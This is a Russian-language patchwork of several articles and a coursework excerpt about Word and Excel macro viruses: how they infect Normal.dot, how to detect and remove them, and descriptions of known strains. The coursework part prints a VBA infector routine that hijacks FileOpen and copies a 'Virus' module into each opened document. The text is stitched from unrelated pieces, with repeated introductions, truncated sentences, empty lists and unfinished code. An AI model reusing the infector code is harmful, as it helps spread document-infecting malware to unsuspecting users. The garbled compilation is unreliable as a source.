Макровирусы вирусы. Что такое макровирусы в компьютерах? Вирусы для Microsoft Excel

Есть такие программы, которые в своей работе используют свой собственный язык программирования, называемые макроязыками. Такие макроязыки, обычно, встраиваются в текстовые и табличные редакторы. Например, в программах Microsoft Word и Excel имеются свои собственные макроязыки. Вирусы, которые написаны и используют в своих целях макроязыки, называются макровирусами. Другими словами, макровирусы — это вирусы, написанные на макроязыках программирования.

Что такое макросы?

Макрос, или макрокоманды, - это команды, записанные пользователем. При вызове макроса будет выполняться тот процесс, который в них вложен. На мирном фронте такие макросы неплохо могут облегчить долгую, нудную, рутинную работу. Стоит прописать соответствующий алгоритм и машина будет делать все сама. Например, в Word`е и Excel`е существуют макросы для открытия, сохранения файла и так далее. Такие макросы довольно существенно могут увеличить скорость работы пользователя.

Принцип работы макровирусов

Так как отредактировать макрос отдельного файла, при наличии соответствующих знаний, не представляется сложным, то с созданием макровируса проблем больших не должно возникнуть. После этого, зараженный документ каким-нибудь образом доставляется жертве. Открывая документ и запуская зараженный макрос(то есть выполняя определенное действие, которое было предопределено ), пользователь активирует вредоносный код. Первым делом многие макровирусы попытаются переписать макросы главного шаблона документа, например, главного шаблона файла Word, который используется для открытия любого файла соответствующего формата. Это обеспечит вирус тем, что при открытии любого документа, вирус будет загружен вместе с ним. Как я уже говорил в статье про то, каждый вирус первым делом старается обеспечить свое повсеместное распространение. Ну, а дальше дело техники: копировать вредоносный код на все вновь открываемые документы. А так как документами мы обмениваемся довольно часто, размножение у вируса будет довольно неплохое.

Вред от макровирусов

Фронт работы макровирусов - документы. И в принципе, они могут наделать все что угодно с Вашими документами. Но кроме этого, макровирусы способны навредить и самому компьютеру, то есть, при особом желании макровирусы могут получить контроль и над самим компьютером. Так что не нужно считать макровирусы вредителями исключительно документов.

Первый в истории макровирус

Самым первым задокументированным макровирусо стал вирус Concept, увидевший свет в 1995 году. Ничего особо страшного он не делал. От него не было вреда, но зато вирус Concept показал все цифровому миру, что и файлы могут нести в себе вредоносный код.

Конечно, помнить каждую из них "в лицо" - невозможная, да и ненужная задача. Однако о некоторых все же стоит знать побольше по причине их опасности и широкой распространенности. В данном материале мы разберем, что это - макровирусы. А также почему важно адекватно оценивать их угрозу.

Макровирусы - это...

Первая половина названия вредоносного элемента произошла от слова "макрос". Это интегрированная составляющая документа MS Word или Excel, написанная на языке VBA. Макрос обладает довольно широкими возможностями: может отформатировать винчестер, удалить файлы, скопировать из хранящейся на ПК информации конфиденциальные данные и отправить их через электронный почтовый ящик. Отсюда выходит большая опасность поражения такого элемента.

Макровирус - это программа, написанная на макроязыке для дальнейшего встраивания в ряд систем обработки и текстовые программы и редакторы, софт по работе с таблицами и т. д. Размножение вредоносных элементов происходит за счет возможностей макроязыков. Поэтому они довольно легко переносятся из документа в документ, от одного компьютера к другому. Какие файлы заражают макровирусы чаще всего? В основном это документы Word, Excel.

Как происходит распространение?

Заражение ПК случается довольно просто. Вам достаточно открыть или закрыть пораженный макровирусом файл на компьютере. Вредоносные элементы при этом перехватывают стандартные А далее они начинают заражать все подобные файлы, к которым вы обращаетесь на своем устройстве.

Макровирусы - это еще и резидентные вредоносные элементы. То есть они активны не только в момент открытия/закрытия документа, но и на протяжении всей работы текстовой, графической или табличной программы! А некоторые из них способны даже оставаться в оперативной памяти компьютера вплоть до его выключения.

Надо отметить и чрезвычайную легкость их создания: злоумышленнику достаточно открыть "Ворд", зайти в "Сервис", после чего в "Макросы". Далее он выбирает редактор Visual Basic, где уже может писать вредоносную программу на языке VBA.

Принцип работы вируса

При реализации той или иной команды Word ищет и выполняет соответствующие макросы:

  • Сохранение документа - FileSave.
  • Вывод на печать - FilePrint.
  • Открытие текстового файла - AutoOpen.
  • Закрытие документа - AutoClose.
  • Запуск самой программы - AutoExec.
  • Создание нового файла - AutoNew и проч.

Подобные макросы, но с иными названиями используются и приложением Excel.

Чтобы поразить вордовский файл, вредоносная программа пользуется одним из данных приемов:

  • Макровирус уже содержит в себе автомакрос.
  • Поражение системы начинается, когда вы ставите на выполнение задачу, предусмотренную разработчиком вируса.
  • Происходит переопределение одного из стандартных макросов. Обычно последний ассоциирован с каким-то пунктом меню "Ворда".
  • Нажимая на определенную клавишу или их комбинацию, вы, сами того не ведая, запускаете в действие вредоносный автомакрос. А он уже начинает свою "работу".

Макровирусы заражают файлы таковым образом:

  1. Вы открываете пораженный текстовый документ.
  2. Происходит копирование кода вируса в глобальные макросы документа.
  3. Последние, уже зараженные, при закрытии файла автоматически записываются в dot-документ (шаблон под названием Normal.dot).
  4. Далее дело за переопределением вирусом стандартных макросов. Это помогает ему перехватывать команды работы с электронными документами.
  5. Когда данные макросы вызываются вами, заражается файл, над которым вы работаете.

Теперь определимся, как установить наличие на компьютере этих вредоносных элементов.

Обнаружение макровирусов

Файловые вирусы в текстах и таблицах возможно определить следующим образом:

  • Не получается записать документ на иной диск или каталог через "Сохранить как..."
  • Невозможность сохранения файла в другом формате (проверяется через команду "Сохранить как...").
  • Не выходит сохранить в файле внесенные вами изменения.
  • Вкладка "Уровень безопасности" становится недоступной. Найти ее можно по пути: "Сервис" - "Макрос" - "Безопасность".
  • При работе с документом может появляться системное сообщение, свидетельствующее об ошибке.
  • Файл по-иному странно себя "ведет".
  • Если вы вызовите щелчком правой клавиши мышки контекстное меню подозреваемого документа и нажмете на "Свойства", то в разделах вкладки "Сводка" разработчиком вредоносной программы будет указана рандомная информация или же просто набор символов.

Устранение проблемы

Любую беду проще всего, конечно, предотвратить. В данном случае на вашем компьютере должен стоять современный антивирус с постоянно обновляющейся базой угроз. Многие такие программы имеют монитор, загруженный в оперативную память. Он определяет зараженные файлы уже на попытке их открытия. Антивирус старается прежде всего вылечить такой документ, при неуспешности (что случается очень редко) блокирует доступ к нему.

Если же вы обнаружили угрозу на незащищенном компьютере, то необходимо скачать антивирус или соответствующую утилиту, которая обнаружит, обезвредит или удалит зараженный файл. Важно также проявлять бдительность и самим: не открывать документы из неизвестных вам источников или же, в крайнем случае, перед этим сканировать их на наличие вредоносных элементов.

Макровирусы - угроза, распространяющаяся через текстовые и табличные файлы. Ее сегодня легко обнаружить и устранить, что при этом не умаляет опасности и вреда, приносимых этой вредоносной программой.

Макровирусы – это потенциально нежелательные утилиты, написанные на микроязыках, которые встроены в графические и текстовые системы обработки. Какие файлы заражают макро вирусы? Ответ очевиден. Наиболее распространенные версии для программ Microsoft Excel, Word и Office 97. Данные вирусы встречаются достаточно часто, как создать их проще простого. Именно поэтому при скачивании документов из Интернета стоит быть крайне внимательными и аккуратными. Большинство пользователей недооценивают их, совершая тем самым грубейшую ошибку.

Как происходит заражение ПК

После того как мы определились, что такое макровирусы, давайте разберемся каким образом они проникают в систему и заражают компьютер. Простой способ их размножения позволяет в кратчайшие сроки поражать максимальное количество объектов. Благодаря возможностям макроязыков, они при закрытии или открытии зараженного документа проникают в программы, к которым идет обращение.

То есть, при использовании графического редактора макровирусы заражают все, что связано с ним. Более того, некоторые активничают все время, пока текстовый или графический редактор работают, или вовсе до полного выключения ПК.

В чем заключается принцип их работы

Их действие происходит по следующему принципу: работая с документами, Microsoft Word выполняет разнообразные команды, отдающиеся на языке макрос. Первым делом программа проникает в главный шаблон, через который открываются все файлы этого формата. При этом вирус копирует свой код в макросы, которые обеспечивают доступ к главным параметрам. Выходя из программы, файл в автоматическом режиме сохраняется в dot (применяется для создания новых документов). После чего он попадает в стандартные макросы, стремясь перехватить отправляемые другим файлам команды, заражая и их.

Заражение осуществляется в следующих случаях:

  1. При наличии авто макроса в вирусе (проводится в автоматическом режиме при выключении или запуске программы).
  2. Вирус обладает основным системным макросом (зачастую связан с пунктами меню).
  3. Активизируется автоматически в случае нажатия на конкретные клавиши или комбинации.
  4. Размножается лишь при его запуске.

Такие вирусы поражают обычно все файлы, созданные и привязанные к программам на макроязыке.

Какой вред они приносят

Не стоит недооценивать макровирусы, так как они относятся к полноценным вирусам и несут компьютерам значительный вред. Они могут легко удалить, скопировать или редактировать любые объекты, содержащие, в том числе, и личную информацию. Более того, им также доступна передача информации другим людям с помощью электронной почты.

Более сильные утилиты вообще могут форматировать винчестеры и контролировать работу всего ПК. Именно поэтому мнение, что подобного рода компьютерные вирусы несут в себе опасность исключительно для графических и текстовых редакторов, ошибочное. Ведь такие утилиты как Word и Excel работают во взаимодействии с целым рядом других, которые в этом случае также подвергаются опасности.

Распознаем зараженный файл

Зачастую файлы, зараженные макровирусами и поддавшиеся их влиянию, определить совсем не сложно. Ведь они функционируют совсем не так, как другие утилиты такого же формата.

Опасность можно определить по следующим признакам:

Кроме того, угроза зачастую легко обнаруживается визуально. Их разработчики обычно указывают во вкладке «Сводка» такую информацию, как название утилиты, категория, тема комментарии и имя автора, благодаря чему от макровируса можно избавиться значительно быстрее и проще. Вызвать ее можно при помощи контекстного меню.

Способы удаления

Обнаружив подозрительный файл или документ, первым делом просканируйте его антивирусом. При обнаружении угрозы антивирусы попробуют вылечить его, а в случае неудачи полностью закроют доступ к нему.

В случае если был заражен весь компьютер, следует воспользоваться аварийным загрузочным диском, который содержит антивирус с последней базой данных. Он проведет сканирование винчестера и обезвредит все найденные им угрозы.

Если защититься таким образом не получается, ваш антивирус ничего не может сделать, а аварийного диска нет, то следует попробовать метод «ручного» лечения:


Таким образом, вы удалите макровирус с зараженного документа, однако это ни в коем случае не значит, что он не остался в системе. Именно поэтому рекомендуется при первой возможности просканировать весь персональный компьютер и все его данные антивирусом или (их преимущество в том, что они не требуют установки).

Процесс лечения и очистки компьютера от заражения макровирусами достаточно сложный, поэтому лучше предотвратить заражение еще на начальных этапах.


Таким образом, вы обезопасите себя, и макровирусы никогда не проникнут в соответствующие файлы.

Компью́терный ви́рус - разновидность компьютерных программ или вредоносный код, отличительной особенностью которых является способность к размножению (саморепликация). В дополнение к этому вирусы могут без ведома пользователя выполнять прочие произвольные действия, в том числе наносящие вред пользователю и/или компьютеру.
Даже если автор вируса не программировал вредоносных эффектов, вирус может приводить к сбоям компьютера из-за ошибок, неучтённых тонкостей взаимодействия с операционной системой и другими программами. Кроме того, вирусы обычно занимают некоторое место на накопителях информации и отбирают некоторые другие ресурсы системы. Поэтому вирусы относят к вредоносным программам.

Введение
4
1. Макровирусы
6
1.1 Макровирусы общие сведения
7
8
2. Постановка задачи
10
3. Обзор наиболее известных вирусов в макросах документов
11
3.1 Распространение макровирусов
13
3.2 Алгоритм работы макровирусов для Microsoft Office
14
4. Способы защиты от вирусов в макросах документов
16
4.1 Обнаружение макровируса
17
4.2 Восстановление пораженных объектов
18
5. Создание вирусов в макросах и их внедрение в файлы документов
19
5.1 Постоянный вывод сообщения на экран
19
5.2 Запуск приложении из макровируса
19
5.3 Автозапуск и выполнение
20
Заключение
21
Список использованной литературы

Работа содержит 1 файл

Процедуры-программы могут исполняться непосредственно или же активироваться по запросу из других макросов. Их синтаксис следующий:

Sub <Имя_Макроса>
-> код макроса <-
" Комментарий начинается с апострофа
End Sub
В качестве примера можно привести следующий макрос:
" Данный макрос открывает окно диалога и выводит в нем сообщение
Sub Stupid_Greeting
MsgBox "ХЭЛЛОУ ВОРЛД"
End Sub

1.2 Макровирусы принципы работы

При работе с документом MS Word версий 6 и 7 выполняет различные действия: открывает документ, сохраняет, печатает, закрывает и т. д. При этом Word ищет и выполняет соответствующие встроенные макросы: при сохранении файла по команде File/Save вызывается макрос FileSave, при сохранении по команде File/SaveAs - FileSaveAs, при печати документов - FilePrint и т. д., если, конечно, таковые макросы определены.

Существуют также несколько «автомакросов», автоматически вызываемых при различных условиях. Например, при открытии документа Word проверяет его на наличие макроса AutoOpen. Если такой макрос присутствует, то Word выполняет его. При закрытии документа Word выполняет макрос AutoClose, при запуске Word вызывается макрос AutoExec, при завершении работы - AutoExit, при создании нового документа - AutoNew. Похожие механизмы, но с другими именами макросов и функций, используются и в Excel/Office 97.

Макровирусы, поражающие файлы Word, Excel или Office 97, как правило пользуются одним из трех вышеперечисленных приемов:

  1. в вирусе присутствует автомакрос (автофункция);
  2. в вирусе переопределен один из стандартных системных макросов (ассоциированный с каким-либо пунктом меню);
  3. макрос вируса автоматически вызывается при нажатии на какую-либо клавишу или комбинацию клавиш.

Бывают также полувирусы, которые не используют перечисленные приемы и размножаются, только если пользователь самостоятельно запускает их на выполнение.

Большинство макровирусов содержат все свои функции в виде стандартных макросов MS Word/Excel/Office 97. Существуют, однако, вирусы, использующие приемы скрытия своего кода и хранящие свой код в виде не-макросов. Известны три подобных приема. Все они используют возможность макросов создавать, редактировать и исполнять другие макросы. Как правило, подобные вирусы имеют небольшой (иногда полиморфный) макрос-загрузчик, который вызывает встроенный редактор макросов, создает новый макрос, заполняет его основным кодом вируса, выполняет и затем, как правило, уничтожает, чтобы скрыть следы присутствия вируса.

  1. Постановка задачи

Основными задачами данного курсового проекта являются:

  1. обзор наиболее известных вирусов в макросах документов;
  2. распространение вирусов в макросах документов;
  3. способы защиты от вирусов в макросах документов;
  4. Создание вирусов в макросах и их внедрение;
    1. Обзор наиболее известных вирусов в макросах документов

Saver (в переводе с англ. - "Сохранитель") представляет собой макро-вирус, функционирующий на машинах с установленным ПО MS Office, в состав компонентов которого входит Word 97 (версия 8.0) или Word 2003 (версия 11.0 - компания-разработчик Microsoft реализовала ее версию совместимой со всеми предшествующими ей версиями Word, что и послужило причиной работоспособности под ней вируса). Свое название вирус получил за текстовую строку-"копирайт", содержащуюся в его коде:
SaverVirus, а также за способность создавать на диске копии зараженных им документов. Написан 2 февраля 2000 года в Конотопе, о чем свидетельствует др. текстовая строка-"копирайт" в его теле:
Макрос записан 02.02.00 КОНОТОП

Saver заражает документы, сохраняемые в формате "DOC", а также файлы с настройками MS Office (DOT-файлы). Документы, записанные в формате "RTF", вирус не может заразить, т.к. в структуре последних отсутствуют макро-секции или "макросы" (секции с настройками, связанными с оформлением текущего документа - размера и типа шрифтов, величины полей, расположения объектов и т.д.), что исключает возможность их заражения. Вирус может быть занесен в машину только через зараженные документы или файлы настроек с вышеуказанными расширениями, если таковые будут открыты пользователем с последующим игнорированием предупреждения встроенной в Word макро-защиты:

Рис1 Предупреждение о запуске макроса

Заражение произойдет в том случае, если будет выбрана опция "Не отключать макросы", что почему-то и делает большинство пользователей при появлении данного запроса. После этого Saver отключает встроенную в Word 97 защиту от вирусов в макросах - VirusProtection (под Word 2003 вирус не может этого сделать, т.к. принцип данной защиты там немного др.) и заражает файл шаблона настроек данного редактора:

ПриWord97:
C:\ProgramFiles\ MicrosoftOffice\Шаблоны\Normal .dot

ПриWord2003:
C:\Documents and Settings\%имя текущего пользователя%\Application Data\Microsoft\Шаблоны\Normal. dot
Изменяя его номинальный размер с 26624 байта на 39424 байта или 27136 байт на 39936 байт(пояснение: Normal.dot может иметь один из двух указанных номинальных размеров, что зависит от некоторых системных условий) для Word 97 (для Word 2003 значение зараженного файла-шаблона может быть различным, поскольку оригинальный размер данного объекта может существенно варьироваться в зависимости от ряда настроек, установленных в Word"е). Затем вирус омертвляет файл Normal.dot, превращая его в дроппер своей программы ("dropper" - пускатель, активатор): изменяет его содержимое таким образом, что управление передается на вирусный код. Этот код вирус сохраняет в создаваемый им файл saver.dll:

ПриWord97:
C:\ProgramFiles\ MicrosoftOffice\Office\saver. dll

ПриWord2003:
C:\ProgramFiles\ MicrosoftOffice\OFFICE11\saver .dll

Данный файл имеет размер 29696 байт и представляет собой модифицированный вирусом файл-шаблон Normal.dot.

W97M.Class

Class.sys - вспомогательный файл к вирусу W97M.Class, "ложится" в корневой каталог C:\ . Текст программы-вируса в конце документа (часть программы пишется еще вNormal.dot, т.к. в теле программы есть проверка на количество строк в этом шаблоне). Вирус поражает файл Normal.dot (это шаблон Word97 , вирус делает его больше 50 кБ), а также поражает все открываемые документы Word, т.е. файлы с расширением *.doc, причем делает их примерно в 2 раза больше по размеру.
Вирус активизируется после 14 мая и будет Вас "приветствовать" и дальше, 14 числа каждого последующего месяца. Перемешивает строки в документах, выдает сообщение: «Я думаю, что" ИМЯ_ПОЛЬЗОВАТЕЛЯ" большой толстый сопляк!»

после этого заменяет строки, сохраняет документ и закрывает его.

W97M.Ethan - макрокомандный вирус, состоящий всего из одной макрокоманды. Заражает документы приложения Word97 при их закрытии и глобальный шаблон NORMAL.DOT.

Благоприятным фактором распространения вируса W97M.Ethan служит то, что в Microsoft Word макросы автоматически запускаются при открытии любого документа, его закрытии, сохранении и т.д.

Кроме того, имеется так называемый общий шаблон NORMAL.DOT и макросы, помещенные в общий шаблон, автоматически запускаются при открытии любого документа. Если учесть, что копирование макросов из документа в документ (в частности, в общий шаблон) выполняется всего одной командой, то среда Microsoft Word представляется идеальной для существования макрокомандных вирусов подобныхW97M.Ethan

Инфицирование системы:

После попадания в систему вирус помещает свою единственную макрокоманду в начало модуля, написанного на языке VBA (Visual Basic for Applications - язык Visual Basic для приложений) - "ThisDocument". "ThisDocument" является модулем в шаблоне MS Word 97.

При заражении документа или общего шаблона вирус использует временный текстовый файл "C:\Ethan.___" который является источником его вирусного кода. Данному файлу вирус присваивает атрибуты системный и скрытый.

4. Распространение макровирусов

При запуске Word"а Normal.dot передает управление вирусному "файлу-шаблону" saver.dll. Опыты, проведенные с вирусом на тест-машине, дали следующие результаты:

1. Вирус заражает документы при их закрытии: записывает в их макросекцию свой код, используя собственный макрос AutoSave ("Автосохранение"). При этом вирус блокирует стандартный запрос о подтверждении сохранения документа с внесенными в него изменениями, в результате чего все произведенные в документе изменения как вирусом, так и пользователем, автоматически сохраняются без ведома последнего.

2. В том случае, если документ был просто открыт пользователем или редактировался и запоминался через опцию "Сохранить", вирус заражает этот документ; если же последний перезапоминался пользователем через опцию "Сохранить как...", то вирус заражает только пересохраненный документ, а исходный оставляет без изменения. При этом и в том, и в др. случаях увеличение размера файлов после заражения зависит от ряда условий и не имеет точного значения.

3. Учитывая тот факт, что вирус заражает документы повторно даже просто при их просмотре без внесения пользователем каких-либо изменений, размер файлов постоянно увеличивается, в связи с чем на старых машинах с жесткими дисками небольшого объема свободное место очень быстро уменьшается. Также может наблюдаться сильное торможение машины при работе с Word"ом, что связано с дополнительными затратами ресурсов оперативной памяти на обработку "раздутых" вирусом макросекций зараженных документов и в конечном итоге может стать реальной причиной зависания последних при их открытии.

4. После заражения первого документа на чистой машине вирус создает свой подкаталог:

ПриWord97:
C:\ProgramFiles\ MicrosoftOffice\Office\Doc_ Copy\

ПриWord2003:
C:\ProgramFiles\ MicrosoftOffice\OFFICE11\Doc_ Copy\

В который копирует каждый из вновь зараженных документов. Впоследствии, если имя текущего открытого документа, заражаемого вирусом (повторно или первый раз - не имеет значения) совпадает с именем копии документа, уже находящейся в каталоге "Doc_Copy", то вирус, в зависимости от своих внутренних счетчиков, может перезаписать оригинальное содержимое текущего документа содержимым из файла-копии, что влечет безвозвратную потерю содержимого текущего документа.
Также существует вероятность утечки конфиденциальных данных в том случае, если за машиной работает несколько пользователей: например, один из них работает с дискеты с документом, содержащим секретную финансовую или какую-либо др. информацию, которую не должны знать остальные пользователи. Однако после того, как вирус создаст копию данного файла в папке "Doc_Copy", содержимое документа может быть доступно для просмотра др. пользователям данного компьютера.

5. После закрытия Word"а программа вируса автоматически отключается - срабатывает вирусный макрос AutoClose ("Автоматическое закрытие").

4.1 Алгоритм работы макровирусов для Microsoft Office

Большинство известных Word-вирусов (версий 6, 7 и Word 97) при запуске переносят собственный код в область глобальных макросов документа («общие» макросы).

При выходе из Word глобальные макросы (включая макросы вируса) автоматически записываются в DOT-файл глобальных макросов (обычно таким файлом является NORMAL.DOT). Таким образом, вирус активизируется в тот момент, когда Word грузит глобальные макросы.

Затем вирус переопределяет (или уже содержит в себе) один или несколько стандартных макросов (например, FileOpen, FileSave, FileSaveAs, FilePrint) и перехватывает таким образом команды работы с файлами. При вызове этих команд заражается файл, к которому идет обращение. Для этого вирус конвертирует файл в формат Template (что делает невозможными дальнейшие изменения формата файла, т. е. конвертирование в какой-либо не-Template формат) и записывает в файл свои макросы, включая Auto-макрос.

Другой способ внедрения вируса в систему базируется на так называемых «Add-in» файлах, т. е. файлах, являющихся служебными дополнениями к Word. В этом случае NORMAL.DOT не изменяется, а Word при запуске загружает макросы вируса из файла (или файлов), определенного как «Add-in». Этот способ практически полностью повторяет заражение глобальных макросов за тем лишь исключением, что макросы вируса хранятся не в NORMAL.DOT, а в каком-либо другом файле.

Возможно также внедрение вируса в файлы, расположенные в каталоге STARTUP. В этом случае Word автоматически подгружает файлы-шаблоны из этого каталога, но такие вирусы пока не встречались.
Рассмотрим вирус, предназначенный для заражения Word-документов. Этот вирус использует служебное имя FileOpen. Процедура FileOpen() выполняется всякий раз, когда пользователь открывает файл и маскируется под обычный диалог Файл->Открыть файл.

InfectorPath = MacroContainer.Path + "\" + MacroContainer.Name

Rem Переменная InfectorPath определяет путь к документу, содержащему вирус.

Dialogs(wdDialogFileOpen).Show

Rem Имитируется диалог Файл->Открыть файл

Infected = False

For Each VbComponent In ActiveDocument.VBProject. VBComponents

If VbComponent.Name = "Virus" Then Infected = True

Rem Здесь открытый пользователем файл проверяется на наличие вируса

If Not Infected Then

Rem Если файл не заражен, вирус дописывается в файл

CopyMacro ActiveDocument.Path + "\" + ActiveDocument.Name, InfectorPath

Public Sub CopyMacro(NewDestination, NewSource)

On Error GoTo nextline

Application.OrganizerCopy Source:= _

NewSource, Destination:=NewDestination, Name:="Virus", Object:= _

WdOrganizerObjectProjectItems

Rem копируем модуль с вирусом

ActiveDocument.Save

Rem сохраняем документ


5. Способы защиты от вирусов в макросах документов

Макровирусы обычно пишут школьники в целях самоутверждения. Такие вирусы не делают ничего плохого - они только размножаются на Вашем компьютере. Однако не следует пренебрегать средствами зашиты от макровирусов, так как с помощью WordBasic можно написать вирус, портящий документы Word, или даже форматирующий жесткий диск. Особенность макровирусов состоит в том, что обычные антивирусы их не распознают. Для защиты от макровирусов можно порекомендовать ViruScan фирмы MacCafee. (http://www.macafee.com). Кроме того существует несколько простых способов предотвратить заражение. В Word 6.0 все макросы хранятся в файлах шаблонов (*.dot) и доступны только при открытом шаблоне. Поскольку при открытии Word автоматически загружает глобальный шаблон Normal.dot, все вирусы стремятся записать себя туда. Поэтому, если Вы работаете в Word 6.0, укажите для файла Normal.dot атрибут "только чтение". Еще один вариант - при открытии подозрительных документов держать нажатой клавишу shift, чтобы не допустить выполнение автомакросов. Ну и разумеется, если Вы обнаружите в списке макросов имена, начинающиеся на auto - сотрите их немедленно.В Word97 макросы могут содержаться не только в шаблонах, но и в обычных документах. Как уже упоминалось, для автоматического запуска макроса при том или ином событии макрос должен иметь одно из следующих имен:

  • AutoExec - Запускается при старте Word или загрузке глобального шаблона
  • AutoNew - Запускается при создании нового документа
  • AutoOpen - Запускается при открытии документа
  • AutoClose - Запускается при закрытии документа
  • AutoExit - Запускается при выходе из Word или при закрытии глобального шаблона.

Конечно можно отменить выполнение таких макросов, нажав клавишу Shift при загрузке Word, а также при открытии, создании и закрытии документов, однако такой способ представляется утомительным. Напишем макрос, препятствующий выполнению автомакросов:

MsgBox "Не допустим размножения вирусов!"


WordBasic.DisableAutoMacros


Для предотвращения заражения документов макровирусами необходимо хорошо предсталять себе их принцип работы. Создатели Microsoft Office облегчили задачу злоумышленников тем, что ввели возможность подменять команды Word макрокомандами пользователя. Это значит, что если в Вашем документе есть макрос с именем, скажем, FileOpen, он будет исполняться всякий раз при открытии другого документа.

Особенно уязвимы пользователи Word 97. В старых добрых версиях Word макросы могли храниться только в шаблонах (файлах *.dot). Office"97 позволяет хранить макросы непосредственно в документе - следовательно, возможностей распространения вирусов становится больше.

Вирусы семейства Macro

Вирусы семейства Macro используют возможности макроязыков, встроенных в системы обработки данных (текстовые редакторы, электронные таблицы и т.д.).

Для существования вирусов в конкретной системе необходимо наличие встроенного в нее макро-языка с возможностями привязки программы на макроязыке к конкретному файлу, копирования макропрограмм из одного файла в другой, получения макропрограммой управления без вмешательства пользователя (автоматические или стандартные макросы).

Данным условиям удовлетворяют редакторы Microsoft Word и AmiPro, а также электронная таблица Excel. Эти системы содержат в себе макроязыки (Word - Word Basic, Excel - Visual Basic), при этом макропрограммы привязаны к конкретному файлу (AmiPro) или находятся внутри файла (Word, Excel), макроязык позволяет копировать файлы (AmiPro) или перемещать макропрограммы в служебные файлы системы (Word, Excel), при работе с файлом при определенных условиях (открытие, закрытие и т.д.) вызываются макропрограммы (если таковые есть), которые определены специальным образом (AmiPro) или имеют стандартные имена (Word, Excel).

Итак, на сегодняшний день известны три системы, для которых существуют вирусы - Microsoft Word, Excel и AmiPro. В них вирусы получают управление при открытии или закрытии зараженного файла, перехватывают стандартные файловые функции и затем заражают файлы, к которым каким-либо образом происходит обращение. По аналогии с MS-DOS можно сказать, что макровирусы являются резидентными - они активны не только в момент открытия/закрытия файла, но и до тех пор, пока активен сам редактор (система).

Вирусы для Microsoft Office"97

Macro.Office97.Frenzy

Состоит из единственного макроса Frenzy, содержащего автофункцию AutoOpen. Заражает систему при открытии зараженного файла. После чего записывается в документы при их открытии. В зависимости от системной даты и системного случайного счетчика выводит текст

Word97.Frenzy by Pyro

Macro.Office97.Minimal

Довольно примитивный макровирус для Office 97. Содержит единственный макрос AutoOpen. Заражает систему при открытии инфицированного файла, в документы также записывается при их открытии. Содержит закомментированный текст

Vesselin Bontchev

Macro.Office97.NightShade

Состоит из единственного макроса NightShade, содержащего автофункцию AutoClose, и заражает систему и документы при закрытии файлов. Выключает встроенную защиту от вирусов и разрешает запуск автофункций. В зависимости от текущей даты и системного случайного счетчика выводит текст

Word97.NightShade by Pyro

По 13-м субботам устанавливает в документах пароль NightShade.

Вирусы для Microsoft Excel

Macro.Excel.Laroux

Заражает электронные таблицы Excel (файлы XLS). Содержит два макроса: Auto_Open и Check_Files. При открытии зараженного файла Excel автоматически выполняет макрос Auto_Open. В вирусе этот макрос содержит всего одну команду, которая определяет макрос Check_Files как выполняемый при активизации любой таблицы (Sheet). Таким образом вирус перехватывает процедуру открытия таблиц и при активировании таблицы зараженный Excel вызывает макрос Check_Files, то есть код вируса.

Получив управление, макрос Check_Files ищет файл PERSONAL.XLS в каталоге запуска Excel (Startup Directory) и проверяет количество модулей в текущем Workbook. Если активным является Workbook с вирусом и файл PERSONAL.XLS не существует (первое заражение), то вирус с помощью команды SaveAs создает в каталоге запуска Excel файл с этим именем. В результате в него записывается код вируса из текущего файла. При очередной загрузке Excel загружает все XLS-файлы из каталога запуска, зараженный файл PERSONAL.XLS также загружается в память, вирус опять получает управление и при открытии таблиц снова будет вызываться макрос Check_Files из PERSONAL.XLS.

Если же количество модулей в текущем Workbook равно 0 (зараженный Workbook не является активным) и файл PERSONAL.XLS уже существует, то вирус переписывает свой код в активный Workbook. После этого активный Workbook становится зараженным.

Проверить систему на наличие вируса несложно. Если вирус уже проник в компьютер, то в каталоге Excel должен присутствовать файл PERSONAL.XLS, в котором видна строка laroux (маленькими буквами). Эта же строка присутствует и в других зараженных файлах.

Macro.Excel.Legend

Макровирус, заражающий файлы Excel. Содержит один модуль (макрос) с именем Legend. Этот модуль включает две процедуры - Auto_Open и INFECT. Auto_Open является процедурой Excel, автоматически вызываемой при открытии файла. При запуске Auto_Open устанавливает вторую процедуру вируса (Infect), как обработчик события SheetActivate, то есть при открытии любой таблицы Excel будет вызывать процедуру Infect.

При вызове процедура Infect заражает либо файл PERSONAL.XLS (когда открыт зараженный файл), либо текущий файл (если он еще не заражен). После заражения вирус удаляет из меню пункт Tools/Macro. Если UserName = "Pyro" и OrganizationName = "VBB", вирус немедленно прекращает работу и не заражает файлов. В зависимости от текущего дня и системного случайного счетчика вирус выводит MessageBox:

You"ve Been Infected By Legend!

Macro.Excel.Robocop

Макровирус, поражающий файлы Excel. Включает два модуля (макроса): COP и ROBO. Модуль ROBO содержит автоматически вызываемую процедуру Auto_Open, которая при открытии зараженного документа записывает код вируса в файл PERSONAL.XLS и устанавливает на код вируса адрес обработчика активизации таблиц (SheetActivate). Затем вирус заражает файлы при открытии таблиц.

ROBOCOP Nightmare Joker

Macro.Excel.Sofa

Заражает таблицы Excel. Содержит один модуль (макрос), имя которого состоит из 11 пробелов и поэтому не видно в списке макросов в меню Tools/Macros. Модуль содержит четыре макрофункции: Auto_Open, Auto_Range, Current_Open, Auto_ Close. Все функции вируса в качестве результата возвращают Null.

При открытии зараженного файла срабатывает макрофункция Auto_Open, которая "переименовывает" Excel - в титульной строке вместо надписи Microsoft Excel появляется Microsofa Excel. Если в каталоге Startup Path отсутствует файл BOOK.XLT (система еще не заражена), то на экран выводится сообщение:

Microsoft Excel has detected a corrupted add-in file.Click OK to repair this file.

Независимо от ответа пользователя в каталоге Startup Path создается файл BOOK.XLT, содержащий код вируса. После заражения выводится сообщение

File successfully repaired!

При загрузке Excel автоматически загружает XLT-файлы из Startup Path и, соответственно, активизирует вирус. Вирус назначает на функцию OnSheetActivate свою функцию Auto_Range и при каждой активации таблицы проверяет активный файл на зараженность и, если файл не заражен, заражает его.

Вирус не дает выгрузить себя из Excel - при закрытии каждого файла назначает на функцию OnWindow ту же функцию Auto_Range, то есть повторно активизируется при открытии нового файла.

Macro.Excel.Yohimbe

Состоит из одного модуля (макроса) с именем Exec. Этот модуль содержит три подпрограммы: Auto_Open, DipDing, PayLoad и функцию SheetExists. Подпрограмма Auto_Open автоматически вызывается при открытии зараженного файла - вирус при этом заражает PERSONAL.XLS. В случае любой ошибки вирус записывается во все открытые файлы (книги). Перед возвратом управления Auto_Open устанавливает подпрограмму DipDing на таймер Excel. Эта подпрограмма вызывается начиная с 16:00 и заражает открытые файлы.

Вирус записывает строку Yohimbe в заголовок таблицы. Он также устанавливает таймер на подпрограмму PayLoad - она вызывается в 16:45 и вставляет в текущую таблицу картинку и текст